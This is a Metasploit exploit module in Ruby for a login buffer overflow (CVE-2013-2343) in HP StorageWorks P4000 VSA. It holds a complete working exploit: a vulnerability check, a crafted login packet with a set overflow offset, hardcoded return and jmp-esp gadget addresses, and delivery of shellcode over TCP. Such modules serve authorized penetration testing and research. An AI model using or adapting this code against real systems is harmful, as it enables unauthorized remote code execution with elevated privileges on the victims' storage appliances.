##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability found in HP's StorageWorks
        P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage
        of the sscanf() function when parsing login requests. This module has been tested
        successfully on the HP VSA 9 Virtual Appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2013-2343'],
          ['OSVDB', '94701'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-179/'],
          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03661318']
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x2f\x00\x0d\x0a",
          'Space'          => 780,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['linux'],
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'HP VSA 9',
            {
              'Version'    => '9.0.0',
              'Offset'     => 3446,
              'Ret'        => 0x0804EB34, # pop ebp # ret # from hydra
              'FakeObject' => 0x08072E58, # from hydra data
              'JmpEsp'     => 0x08050CB8  # push esp # ret # from hydra
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Jun 28 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ], self.class)
  end

  def check
    connect
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
    print_status("#{rhost}:#{rport} Sending login packet to check...")
    sock.put(packet)
    res = sock.get_once
    disconnect

    if res and res=~ /OK/ and res =~ /Login/
      return Exploit::CheckCode::Vulnerable
    elsif res and res =~ /FAILED/ and res =~ /version/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def generate_packet(data)
    pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
    pkt << [data.length + 1].pack("N*")
    pkt << "\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
    pkt << data
    pkt << "\x00"

    pkt
  end

  def exploit
    connect
    print_status("#{rhost}:#{rport} Sending login packet")
    my_bof = rand_text(target['Offset'])
    my_bof << [target.ret].pack("V")
    my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret
    my_bof << [target['JmpEsp']].pack("V")
    my_bof << payload.encoded

    packet = generate_packet("login:/#global$agent/#{my_bof}/#{rand_text_alpha(5)}/Version \"1\" ") # Fake version in order to ret asap
    sock.put(packet)
    disconnect
  end

end